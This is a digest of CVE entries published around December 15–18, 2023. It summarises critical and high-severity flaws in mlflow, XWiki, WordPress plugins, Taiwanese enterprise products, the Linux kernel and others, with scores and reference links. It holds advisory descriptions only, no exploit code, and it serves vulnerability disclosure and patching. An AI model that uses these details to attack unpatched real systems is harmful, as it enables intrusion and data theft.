Latest vulnerabilities [Monday, December 18, 2023 + weekend]


Last update performed on 12/18/2023 at 11:57:06 PM

(21) CRITICAL VULNERABILITIES [9.0, 10.0]

Source : huntr.dev

Vulnerability ID : CVE-2023-6831

First published on : 15-12-2023 01:15:08
Last modified on : 15-12-2023 13:42:13

Description :
Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.

CVE ID : CVE-2023-6831
Source : security@huntr.dev
CVSS Score : 10.0

References :
https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1 | source : security@huntr.dev
https://huntr.com/bounties/0acdd745-0167-4912-9d5c-02035fe5b314 | source : security@huntr.dev

Vulnerability : CWE-29


Vulnerability ID : CVE-2023-6909

First published on : 18-12-2023 04:15:52
Last modified on : 18-12-2023 14:05:17

Description :
Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.

CVE ID : CVE-2023-6909
Source : security@huntr.dev
CVSS Score : 9.3

References :
https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1 | source : security@huntr.dev
https://huntr.com/bounties/11209efb-0f84-482f-add0-587ea6b7e850 | source : security@huntr.dev

Vulnerability : CWE-29


Source : github.com

Vulnerability ID : CVE-2023-50721

First published on : 15-12-2023 19:15:09
Last modified on : 15-12-2023 20:09:58

Description :
XWiki Platform is a generic wiki platform. Starting in 4.5-rc-1 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the search administration interface doesn't properly escape the id and label of search user interface extensions, allowing the injection of XWiki syntax containing script macros, including Groovy macros, that allow remote code execution, impacting the confidentiality, integrity and availability of the whole XWiki instance. This attack can be executed by any user who can edit some wiki page like the user's profile (editable by default), as user interface extensions that will be displayed in the search administration can be added on any document by any user. The necessary escaping has been added in XWiki 14.10.15, 15.5.2 and 15.7RC1. As a workaround, the patch can be manually applied to the page `XWiki.SearchAdmin`.

CVE ID : CVE-2023-50721
Source : security-advisories@github.com
CVSS Score : 9.9

References :
https://github.com/xwiki/xwiki-platform/commit/62863736d78ffd60d822279c5fb7fb9593042766 | source : security-advisories@github.com
https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-7654-vfh6-rw6x | source : security-advisories@github.com
https://jira.xwiki.org/browse/XWIKI-21200 | source : security-advisories@github.com

Vulnerability : CWE-94
Vulnerability : CWE-95


Vulnerability ID : CVE-2023-50723

First published on : 15-12-2023 19:15:10
Last modified on : 15-12-2023 20:09:58

Description :
XWiki Platform is a generic wiki platform. Starting in 2.3 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, anyone who can edit an arbitrary wiki page in an XWiki installation can gain programming right through several cases of missing escaping in the code for displaying sections in the administration interface. This impacts the confidentiality, integrity and availability of the whole XWiki installation. Normally, all users are allowed to edit their own user profile so this should be exploitable by all users of the XWiki instance. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1. The patches can be manually applied to the `XWiki.ConfigurableClassMacros` and `XWiki.ConfigurableClass` pages.

CVE ID : CVE-2023-50723
Source : security-advisories@github.com
CVSS Score : 9.9

References :
https://github.com/xwiki/xwiki-platform/commit/0f367aaae4e0696f61cf5a67a75edd27d1d16db6 | source : security-advisories@github.com
https://github.com/xwiki/xwiki-platform/commit/1157c1ecea395aac7f64cd8a6f484b1225416dc7 | source : security-advisories@github.com
https://github.com/xwiki/xwiki-platform/commit/749f6aee1bfbcf191c3734ea0aa9eba3aa63240e | source : security-advisories@github.com
https://github.com/xwiki/xwiki-platform/commit/bd82be936c21b65dee367d558e3050b9b6995713 | source : security-advisories@github.com
https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-qj86-p74r-7wp5 | source : security-advisories@github.com
https://jira.xwiki.org/browse/XWIKI-21121 | source : security-advisories@github.com
https://jira.xwiki.org/browse/XWIKI-21122 | source : security-advisories@github.com
https://jira.xwiki.org/browse/XWIKI-21194 | source : security-advisories@github.com

Vulnerability : CWE-94
Vulnerability : CWE-95


Vulnerability ID : CVE-2023-50722

First published on : 15-12-2023 19:15:09
Last modified on : 15-12-2023 20:09:58

Description :
XWiki Platform is a generic wiki platform. Starting in 2.3 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, there is a reflected XSS or also direct remote code execution vulnerability in the code for displaying configurable admin sections. The code that can be passed through a URL parameter is only executed when the user who is visiting the crafted URL has edit right on at least one configuration section. While any user of the wiki could easily create such a section, this vulnerability doesn't require the attacker to have an account or any access on the wiki. It is sufficient to trick any admin user of the XWiki installation to visit the crafted URL. This vulnerability allows full remote code execution with programming rights and thus impacts the confidentiality, integrity and availability of the whole XWiki installation. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1. The patch can be manually applied to the document `XWiki.ConfigurableClass`.

CVE ID : CVE-2023-50722
Source : security-advisories@github.com
CVSS Score : 9.6

References :
https://github.com/xwiki/xwiki-platform/commit/5e14c8d08fd0c5b619833d35090b470aa4cb52b0 | source : security-advisories@github.com
https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-cp3j-273x-3jxc | source : security-advisories@github.com
https://jira.xwiki.org/browse/XWIKI-21167 | source : security-advisories@github.com

Vulnerability : CWE-352
Vulnerability : CWE-79


Vulnerability ID : CVE-2023-46116

First published on : 15-12-2023 14:15:14
Last modified on : 15-12-2023 15:26:42

Description :
Tutanota (Tuta Mail) is an encrypted email provider. Tutanota allows users to open links in emails in external applications. Prior to version 3.118.12, it correctly blocks the `file:` URL scheme, which can be used by malicious actors to gain code execution on a victim's computer, but fails to check other harmful schemes such as `ftp:`, `smb:`, etc., which can also be used. Successful exploitation of this vulnerability will enable an attacker to gain code execution on a victim's computer. Version 3.118.2 contains a patch for this issue.

CVE ID : CVE-2023-46116
Source : security-advisories@github.com
CVSS Score : 9.3

References :
https://github.com/tutao/tutanota/blob/master/src/desktop/ApplicationWindow.ts#L417 | source : security-advisories@github.com
https://github.com/tutao/tutanota/blob/master/src/desktop/ApplicationWindow.ts#L423 | source : security-advisories@github.com
https://github.com/tutao/tutanota/commit/88ecad17d00d05a722399aed35f0d280899d55a2 | source : security-advisories@github.com
https://github.com/tutao/tutanota/security/advisories/GHSA-mxgj-pq62-f644 | source : security-advisories@github.com
https://user-images.githubusercontent.com/46137338/270564886-7a0389d3-f9ef-44e1-9f5e-57ccc72dcaa8.mp4 | source : security-advisories@github.com

Vulnerability : CWE-20


Source : cert.org.tw

Vulnerability ID : CVE-2023-48371

First published on : 15-12-2023 04:15:06
Last modified on : 15-12-2023 13:42:13

Description :
ITPison OMICARD EDM’s file uploading function does not restrict the upload of files with dangerous types. An unauthenticated remote attacker can exploit this vulnerability to upload and run arbitrary executable files to perform arbitrary system commands or disrupt service.

CVE ID : CVE-2023-48371
Source : twcert@cert.org.tw
CVSS Score : 9.8

References :
https://www.twcert.org.tw/tw/cp-132-7590-55002-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-48372

First published on : 15-12-2023 05:15:07
Last modified on : 15-12-2023 13:42:13

Description :
ITPison OMICARD EDM's SMS-related function has insufficient validation for user input. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify and delete the database.

CVE ID : CVE-2023-48372
Source : twcert@cert.org.tw
CVSS Score : 9.8

References :
https://www.twcert.org.tw/tw/cp-132-7591-07c51-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-48376

First published on : 15-12-2023 08:15:45
Last modified on : 15-12-2023 13:42:13

Description :
SmartStar Software CWS is a web-based integration platform. Its file uploading function does not restrict the upload of files with dangerous types. An unauthenticated remote attacker can exploit this vulnerability to upload arbitrary files to perform arbitrary commands or disrupt service.

CVE ID : CVE-2023-48376
Source : twcert@cert.org.tw
CVSS Score : 9.8

References :
https://www.twcert.org.tw/tw/cp-132-7595-d58b1-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-48384

First published on : 15-12-2023 09:15:08
Last modified on : 15-12-2023 13:42:13

Description :
ArmorX Global Technology Corporation ArmorX Spam has insufficient validation for user input within a special function. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify and delete the database.

CVE ID : CVE-2023-48384
Source : twcert@cert.org.tw
CVSS Score : 9.8

References :
https://www.twcert.org.tw/tw/cp-132-7601-71c94-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-48388

First published on : 15-12-2023 09:15:08
Last modified on : 15-12-2023 13:42:13

Description :
Multisuns EasyLog web+ has a vulnerability of using hard-coded credentials. A remote attacker can exploit this vulnerability to access the system to perform arbitrary system operations or disrupt service.

CVE ID : CVE-2023-48388
Source : twcert@cert.org.tw
CVSS Score : 9.8

References :
https://www.twcert.org.tw/tw/cp-132-7603-b1061-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-798


Vulnerability ID : CVE-2023-48390

First published on : 15-12-2023 09:15:08
Last modified on : 15-12-2023 13:42:13

Description :
Multisuns EasyLog web+ has a code injection vulnerability. An unauthenticated remote attacker can exploit this vulnerability to inject code and access the system to perform arbitrary system operations or disrupt service.

CVE ID : CVE-2023-48390
Source : twcert@cert.org.tw
CVSS Score : 9.8

References :
https://www.twcert.org.tw/tw/cp-132-7605-2d86d-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-94


Vulnerability ID : CVE-2023-48392

First published on : 15-12-2023 10:15:07
Last modified on : 15-12-2023 13:42:13

Description :
Kaifa Technology WebITR is an online attendance system. It has a vulnerability in using a hard-coded encryption key. An unauthenticated remote attacker can generate a valid token parameter and exploit this vulnerability to access the system with an arbitrary user account, including the administrator’s account, to execute the login account’s permissions, and obtain relevant information.

CVE ID : CVE-2023-48392
Source : twcert@cert.org.tw
CVSS Score : 9.8

References :
https://www.twcert.org.tw/tw/cp-132-7622-57e5f-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-798


Source : wordfence.com

Vulnerability ID : CVE-2023-6553

First published on : 15-12-2023 11:15:47
Last modified on : 15-12-2023 13:41:51

Description :
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated attackers to easily execute code on the server.

CVE ID : CVE-2023-6553
Source : security@wordfence.com
CVSS Score : 9.8

References :
https://plugins.trac.wordpress.org/browser/backup-backup/tags/1.3.7/includes/backup-heart.php#L118 | source : security@wordfence.com
https://plugins.trac.wordpress.org/browser/backup-backup/tags/1.3.7/includes/backup-heart.php#L38 | source : security@wordfence.com
https://plugins.trac.wordpress.org/browser/backup-backup/tags/1.3.7/includes/backup-heart.php#L62 | source : security@wordfence.com
https://plugins.trac.wordpress.org/browser/backup-backup/tags/1.3.7/includes/backup-heart.php#L64 | source : security@wordfence.com
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3006541%40backup-backup&new=3006541%40backup-backup&sfp_email=&sfph_mail= | source : security@wordfence.com
https://www.synacktiv.com/en/publications/php-filters-chain-what-is-it-and-how-to-use-it | source : security@wordfence.com
https://www.wordfence.com/threat-intel/vulnerabilities/id/3511ba64-56a3-43d7-8ab8-c6e40e3b686e?source=cve | source : security@wordfence.com


Source : vuldb.com

Vulnerability ID : CVE-2023-6906

First published on : 18-12-2023 04:15:51
Last modified on : 18-12-2023 14:05:17

Description :
A vulnerability, which was classified as critical, was found in Totolink A7100RU 7.4cu.2313_B20191024. Affected is the function main of the file /cgi-bin/cstecgi.cgi?action=login of the component HTTP POST Request Handler. The manipulation of the argument flag with the input ie8 leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248268. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2023-6906
Source : cna@vuldb.com
CVSS Score : 9.8

References :
https://github.com/unpWn4bL3/iot-security/blob/main/1.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.248268 | source : cna@vuldb.com
https://vuldb.com/?id.248268 | source : cna@vuldb.com

Vulnerability : CWE-120


Source : zabbix.com

Vulnerability ID : CVE-2023-32725

First published on : 18-12-2023 10:15:06
Last modified on : 18-12-2023 14:05:17

Description :
The website configured in the URL widget will receive a session cookie when testing or executing scheduled reports. The received session cookie can then be used to access the frontend as the particular user.

CVE ID : CVE-2023-32725
Source : security@zabbix.com
CVSS Score : 9.6

References :
https://support.zabbix.com/browse/ZBX-23854 | source : security@zabbix.com

Vulnerability : CWE-565


Source : a87f365f-9d39-4848-9b3a-58c7cae69cab

Vulnerability ID : CVE-2023-33218

First published on : 15-12-2023 12:15:43
Last modified on : 15-12-2023 13:41:51

Description :
The Parameter Zone Read and Parameter Zone Write command handlers allow performing a Stack buffer overflow. This could potentially lead to a Remote Code execution on the targeted device.

CVE ID : CVE-2023-33218
Source : a87f365f-9d39-4848-9b3a-58c7cae69cab
CVSS Score : 9.1

References :
https://www.idemia.com/wp-content/uploads/2023/11/Security-Advisory-SA-2023-05-2.pdf | source : a87f365f-9d39-4848-9b3a-58c7cae69cab

Vulnerability : CWE-121


Vulnerability ID : CVE-2023-33219

First published on : 15-12-2023 12:15:43
Last modified on : 15-12-2023 13:41:51

Description :
The handler of the retrofit validation command doesn't properly check the boundaries when performing certain validation operations. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device.

CVE ID : CVE-2023-33219
Source : a87f365f-9d39-4848-9b3a-58c7cae69cab
CVSS Score : 9.1

References :
https://www.idemia.com/wp-content/uploads/2023/11/Security-Advisory-SA-2023-05-2.pdf | source : a87f365f-9d39-4848-9b3a-58c7cae69cab

Vulnerability : CWE-121


Vulnerability ID : CVE-2023-33220

First published on : 15-12-2023 12:15:43
Last modified on : 15-12-2023 13:41:51

Description :
During the retrofit validation process, the firmware doesn't properly check the boundaries while copying some attributes to check. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device.

CVE ID : CVE-2023-33220
Source : a87f365f-9d39-4848-9b3a-58c7cae69cab
CVSS Score : 9.1

References :
https://www.idemia.com/wp-content/uploads/2023/11/Security-Advisory-SA-2023-05-2.pdf | source : a87f365f-9d39-4848-9b3a-58c7cae69cab

Vulnerability : CWE-121


Source : cert-in.org.in

Vulnerability ID : CVE-2023-6483

First published on : 18-12-2023 08:15:07
Last modified on : 18-12-2023 14:05:17

Description :
The vulnerability exists in ADiTaaS (Allied Digital Integrated Tool-as-a-Service) version 5.1 due to an improper authentication vulnerability in the ADiTaaS backend API. An unauthenticated remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to the vulnerable platform. Successful exploitation of this vulnerability could allow the attacker to gain full access to the customers’ data and completely compromise the targeted platform.

CVE ID : CVE-2023-6483
Source : vdisclose@cert-in.org.in
CVSS Score : 9.1

References :
https://cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2023-0365 | source : vdisclose@cert-in.org.in

Vulnerability : CWE-287


Source : silabs.com

Vulnerability ID : CVE-2023-4020

First published on : 15-12-2023 21:15:08
Last modified on : 18-12-2023 14:05:33

Description :
An unvalidated input in a library function responsible for communicating between secure and non-secure memory in Silicon Labs TrustZone implementation allows reading/writing of memory in the secure region of memory from the non-secure region of memory.

CVE ID : CVE-2023-4020
Source : product-security@silabs.com
CVSS Score : 9.0

References :
https://community.silabs.com/069Vm0000004b95IAA | source : product-security@silabs.com
https://github.com/SiliconLabs/gecko_sdk/releases | source : product-security@silabs.com

Vulnerability : CWE-20


(39) HIGH VULNERABILITIES [7.0, 8.9]

Source : cert.org.tw

Vulnerability ID : CVE-2023-48375

First published on : 15-12-2023 08:15:45
Last modified on : 15-12-2023 13:42:13

Description :
SmartStar Software CWS is a web-based integration platform. It has a vulnerability of missing authorization, and users are able to access data or perform actions that they should not be allowed to perform via commands. An authenticated user with normal user privilege can execute administrator privilege, resulting in performing arbitrary system operations or disrupting service.

CVE ID : CVE-2023-48375
Source : twcert@cert.org.tw
CVSS Score : 8.8

References :
https://www.twcert.org.tw/tw/cp-132-7594-dac20-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-862


Vulnerability ID : CVE-2023-48394

First published on : 15-12-2023 10:15:08
Last modified on : 15-12-2023 13:42:13

Description :
Kaifa Technology WebITR is an online attendance system. Its file uploading function does not restrict the upload of files with dangerous types. A remote attacker with regular user privilege can exploit this vulnerability to upload arbitrary files to perform arbitrary commands or disrupt service.

CVE ID : CVE-2023-48394
Source : twcert@cert.org.tw
CVSS Score : 8.8

References :
https://www.twcert.org.tw/tw/cp-132-7624-d0300-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-48373

First published on : 15-12-2023 05:15:08
Last modified on : 15-12-2023 13:42:13

Description :
ITPison OMICARD EDM has a path traversal vulnerability within its parameter “FileName” in a specific function. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files.

CVE ID : CVE-2023-48373
Source : twcert@cert.org.tw
CVSS Score : 7.5

References :
https://www.twcert.org.tw/tw/cp-132-7592-998bf-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-22


Vulnerability ID : CVE-2023-48378

First published on : 15-12-2023 08:15:45
Last modified on : 15-12-2023 13:42:13

Description :
Softnext Mail SQR Expert has a path traversal vulnerability within its parameter in a specific URL. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files.

CVE ID : CVE-2023-48378
Source : twcert@cert.org.tw
CVSS Score : 7.5

References :
https://www.twcert.org.tw/tw/cp-132-7596-648f3-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-22


Vulnerability ID : CVE-2023-48389

First published on : 15-12-2023 09:15:08
Last modified on : 15-12-2023 13:42:13

Description :
Multisuns EasyLog web+ has a path traversal vulnerability within its parameter in a specific URL. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files.

CVE ID : CVE-2023-48389
Source : twcert@cert.org.tw
CVSS Score : 7.5

References :
https://www.twcert.org.tw/tw/cp-132-7604-ab0fd-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-22


Vulnerability ID : CVE-2023-48380

First published on : 15-12-2023 09:15:07
Last modified on : 15-12-2023 13:42:13

Description :
Softnext Mail SQR Expert is an email management platform. It has insufficient filtering for a special character within a specific function. A remote attacker authenticated as a localhost can exploit this vulnerability to perform command injection attacks, to execute arbitrary system commands, manipulate the system or disrupt service.

CVE ID : CVE-2023-48380
Source : twcert@cert.org.tw
CVSS Score : 7.4

References :
https://www.twcert.org.tw/tw/cp-132-7598-37b03-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-78


Source : ed10eef1-636d-4fbe-9993-6890dfa878f8

Vulnerability ID : CVE-2023-6837

First published on : 15-12-2023 10:15:09
Last modified on : 15-12-2023 13:41:51

Description :
Multiple WSO2 products have been identified as vulnerable to user impersonation using JIT provisioning. In order for this vulnerability to have any impact on your deployment, the following conditions must be met:
* An IDP configured for federated authentication and JIT provisioning enabled with the "Prompt for username, password and consent" option.
* A service provider that uses the above IDP for federated authentication and has the "Assert identity using mapped local subject identifier" flag enabled.
Attacker should have:
* A fresh valid user account in the federated IDP that has not been used earlier.
* Knowledge of the username of a valid user in the local IDP.
When all preconditions are met, a malicious actor could use JIT provisioning flow to perform user impersonation.

CVE ID : CVE-2023-6837
Source : ed10eef1-636d-4fbe-9993-6890dfa878f8
CVSS Score : 8.5

References :
https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2022/WSO2-2021-1573/ | source : ed10eef1-636d-4fbe-9993-6890dfa878f8


Source : google.com

Vulnerability ID : CVE-2023-6817

First published on : 18-12-2023 15:15:10
Last modified on : 18-12-2023 17:24:19

Description :
A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation. The function nft_pipapo_walk did not skip inactive elements during set walk, which could lead to double deactivations of PIPAPO (Pile Packet Policies) elements, leading to use-after-free. We recommend upgrading past commit 317eb9685095678f2c9f5a8189de698c5354316a.

CVE ID : CVE-2023-6817
Source : cve-coordination@google.com
CVSS Score : 7.8

References :
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=317eb9685095678f2c9f5a8189de698c5354316a | source : cve-coordination@google.com
https://kernel.dance/317eb9685095678f2c9f5a8189de698c5354316a | source : cve-coordination@google.com

Vulnerability : CWE-416


Source : hq.dhs.gov

Vulnerability ID : CVE-2023-6691

First published on : 18-12-2023 18:15:08
Last modified on : 18-12-2023 19:05:45

Description :
Cambium ePMP Force 300-25 version 4.7.0.1 is vulnerable to a code injection vulnerability that could allow an attacker to perform remote code execution and gain root privileges.

CVE ID : CVE-2023-6691
Source : ics-cert@hq.dhs.gov
CVSS Score : 7.8

References :
https://www.cisa.gov/news-events/ics-advisories/icsa-23-348-01 | source : ics-cert@hq.dhs.gov

Vulnerability : CWE-94


Source : wordfence.com

Vulnerability ID : CVE-2023-6827

First published on : 15-12-2023 08:15:46
Last modified on : 15-12-2023 13:42:13

Description :
The Essential Real Estate plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the 'ajaxUploadFonts' function in versions up to, and including, 4.3.5. This makes it possible for authenticated attackers with subscriber-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVE ID : CVE-2023-6827
Source : security@wordfence.com
CVSS Score : 7.5

References :
https://plugins.trac.wordpress.org/browser/essential-real-estate/tags/4.3.5/lib/smart-framework/core/fonts/fonts.class.php#L524 | source : security@wordfence.com
https://plugins.trac.wordpress.org/changeset/3009780/essential-real-estate | source : security@wordfence.com
https://www.wordfence.com/threat-intel/vulnerabilities/id/8bb2ce22-077b-41dd-a2ff-cc1db9d20d38?source=cve | source : security@wordfence.com


Vulnerability ID : CVE-2023-6559

First published on : 16-12-2023 13:15:07
Last modified on : 18-12-2023 14:05:28

Description :
The MW WP Form plugin for WordPress is vulnerable to arbitrary file deletion in all versions up to, and including, 5.0.3. This is due to the plugin not properly validating the path of an uploaded file prior to deleting it. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible.

CVE ID : CVE-2023-6559
Source : security@wordfence.com
CVSS Score : 7.5

References :
https://plugins.trac.wordpress.org/changeset/3007879/mw-wp-form | source : security@wordfence.com
https://www.wordfence.com/threat-intel/vulnerabilities/id/412d555c-9bbd-42f5-8020-ccfc18755a79?source=cve | source : security@wordfence.com


Vulnerability ID : CVE-2023-6826

First published on : 15-12-2023 08:15:46
Last modified on : 15-12-2023 13:42:13

Description :
The E2Pdf plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the 'import_action' function in versions up to, and including, 1.20.25. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin, to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVE ID : CVE-2023-6826
Source : security@wordfence.com
CVSS Score : 7.2

References :
https://plugins.trac.wordpress.org/browser/e2pdf/trunk/classes/controller/e2pdf-templates.php?rev=2993824#L1488 | source : security@wordfence.com
https://plugins.trac.wordpress.org/browser/e2pdf/trunk/classes/controller/e2pdf-templates.php?rev=2993824#L753 | source : security@wordfence.com
https://plugins.trac.wordpress.org/changeset/3009695/e2pdf#file0 | source : security@wordfence.com
https://www.wordfence.com/threat-intel/vulnerabilities/id/03faec37-2cce-4e14-92f2-d941ab1b4ce9?source=cve | source : security@wordfence.com


Source : a87f365f-9d39-4848-9b3a-58c7cae69cab

Vulnerability ID : CVE-2023-33217

First published on : 15-12-2023 11:15:08
Last modified on : 15-12-2023 13:41:51

Description :
By abusing a design flaw in the firmware upgrade mechanism of the impacted terminal, it's possible to cause a permanent denial of service for the terminal. The only way to recover the terminal is by sending it back to the manufacturer.

CVE ID : CVE-2023-33217
Source : a87f365f-9d39-4848-9b3a-58c7cae69cab
CVSS Score : 7.5

References :
https://www.idemia.com/wp-content/uploads/2023/11/Security-Advisory-SA-2023-05-2.pdf | source : a87f365f-9d39-4848-9b3a-58c7cae69cab

Vulnerability : CWE-20


Source : github.com

Vulnerability ID : CVE-2023-50719

First published on : 15-12-2023 19:15:09
Last modified on : 15-12-2023 20:09:58

Description :
XWiki Platform is a generic wiki platform. Starting in 7.2-milestone-2 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the password hashes of all users to anyone with view right on the respective user profiles. By default, all user profiles are public. This vulnerability also affects any configurations used by extensions that contain passwords like API keys that are viewable for the attacker. Normally, such passwords aren't accessible but this vulnerability would disclose them as plain text. This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1. There are no known workarounds for this vulnerability.

CVE ID : CVE-2023-50719
Source : security-advisories@github.com
CVSS Score : 7.5

References :
https://github.com/xwiki/xwiki-platform/commit/3e5272f2ef0dff06a8f4db10afd1949b2f9e6eea | source : security-advisories@github.com
https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-p6cp-6r35-32mh | source : security-advisories@github.com
https://jira.xwiki.org/browse/XWIKI-21208 | source : security-advisories@github.com

Vulnerability : CWE-200
Vulnerability : CWE-359


Vulnerability ID : CVE-2023-50264

First published on : 15-12-2023 21:15:08
Last modified on : 18-12-2023 14:05:33

Description :
Bazarr manages and downloads subtitles. Prior to 1.3.1, Bazarr contains an arbitrary file read: the /system/backup/download/ endpoint in bazarr/app/ui.py does not validate the user-controlled filename variable and uses it in the send_file function, which leads to an arbitrary file read on the system. This issue is fixed in version 1.3.1.

CVE ID : CVE-2023-50264
Source : security-advisories@github.com
CVSS Score : 7.5

References :
https://github.com/morpheus65535/bazarr/commit/17add7fbb3ae1919a40d505470d499d46df9ae6b | source : security-advisories@github.com
https://github.com/morpheus65535/bazarr/releases/tag/v1.3.1 | source : security-advisories@github.com
https://securitylab.github.com/advisories/GHSL-2023-192_GHSL-2023-194_bazarr/ | source : security-advisories@github.com

Vulnerability : CWE-22


Vulnerability ID : CVE-2023-50265

First published on : 15-12-2023 21:15:08
Last modified on : 18-12-2023 14:05:33

Description :
Bazarr manages and downloads subtitles. Prior to 1.3.1, the /api/swaggerui/static endpoint in bazarr/app/ui.py does not validate the user-controlled filename variable and uses it in the send_file function, which leads to an arbitrary file read on the system. This issue is fixed in version 1.3.1.

CVE ID : CVE-2023-50265
Source : security-advisories@github.com
CVSS Score : 7.5

References :
https://github.com/morpheus65535/bazarr/commit/17add7fbb3ae1919a40d505470d499d46df9ae6b | source : security-advisories@github.com
https://github.com/morpheus65535/bazarr/releases/tag/v1.3.1 | source : security-advisories@github.com
https://securitylab.github.com/advisories/GHSL-2023-192_GHSL-2023-194_bazarr/ | source : security-advisories@github.com

Vulnerability : CWE-22


Source : hackerone.com

Vulnerability ID : CVE-2023-39340

First published on : 16-12-2023 02:15:07
Last modified on : 18-12-2023 14:05:33

Description :
A vulnerability exists on all versions of Ivanti Connect Secure below 22.6R2 where an attacker can send a specific request which may lead to Denial of Service (DoS) of the appliance.

CVE ID : CVE-2023-39340
Source : support@hackerone.com
CVSS Score : 7.5

References :
https://forums.ivanti.com/s/article/Security-fix-release-Ivanti-Connect-Secure-22-6R2-and-22-6R2-1?language=en_US | source : support@hackerone.com


Source : bosch.com

Vulnerability ID : CVE-2023-32230

First published on : 18-12-2023 13:15:06
Last modified on : 18-12-2023 14:05:17

Description :
An improper handling of a malformed API request to an API server in Bosch BT software products can allow an unauthenticated attacker to cause a Denial of Service (DoS) situation.

CVE ID : CVE-2023-32230
Source : psirt@bosch.com
CVSS Score : 7.5

References :
https://psirt.bosch.com/security-advisories/BOSCH-SA-092656-BT.html | source : psirt@bosch.com

Vulnerability : CWE-703


Vulnerability ID : CVE-2023-39509

First published on : 18-12-2023 13:15:07
Last modified on : 18-12-2023 14:05:17

Description :
A command injection vulnerability exists in Bosch IP cameras that allows an authenticated user with administrative rights to run arbitrary commands on the OS of the camera.

CVE ID : CVE-2023-39509
Source : psirt@bosch.com
CVSS Score : 7.2

References :
https://psirt.bosch.com/security-advisories/BOSCH-SA-638184-BT.html | source : psirt@bosch.com

Vulnerability : CWE-20


Source : redhat.com

Vulnerability ID : CVE-2023-3430

First published on : 18-12-2023 14:15:08
Last modified on : 18-12-2023 15:04:28

Description :
A vulnerability was found in OpenImageIO, where a heap buffer overflow exists in the src/gif.imageio/gifinput.cpp file. This flaw allows a remote attacker to pass a specially crafted file to the application, which triggers a heap-based buffer overflow and could cause a crash, leading to a denial of service.

CVE ID : CVE-2023-3430
Source : secalert@redhat.com
CVSS Score : 7.5

References :
https://bugzilla.redhat.com/show_bug.cgi?id=2218380 | source : secalert@redhat.com

Vulnerability : CWE-122


Vulnerability ID : CVE-2023-5384

First published on : 18-12-2023 14:15:11
Last modified on : 18-12-2023 15:04:28

Description :
A flaw was found in Infinispan. When serializing the configuration for a cache to XML/JSON/YAML, which contains credentials (JDBC store with connection pooling, remote store), the credentials are returned in clear text as part of the configuration.

CVE ID : CVE-2023-5384
Source : secalert@redhat.com
CVSS Score : 7.2

References :
https://access.redhat.com/errata/RHSA-2023:7676 | source : secalert@redhat.com
https://access.redhat.com/security/cve/CVE-2023-5384 | source : secalert@redhat.com
https://bugzilla.redhat.com/show_bug.cgi?id=2242156 | source : secalert@redhat.com

Vulnerability : CWE-312


Vulnerability ID : CVE-2023-47038

First published on : 18-12-2023 14:15:08
Last modified on : 18-12-2023 15:04:28

Description :
A vulnerability was found in perl. This issue occurs when a crafted regular expression is compiled by perl, which can allow an attacker-controlled byte buffer overflow in a heap-allocated buffer.

CVE ID : CVE-2023-47038
Source : secalert@redhat.com
CVSS Score : 7.0

References :
https://access.redhat.com/security/cve/CVE-2023-47038 | source : secalert@redhat.com
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1056746 | source : secalert@redhat.com
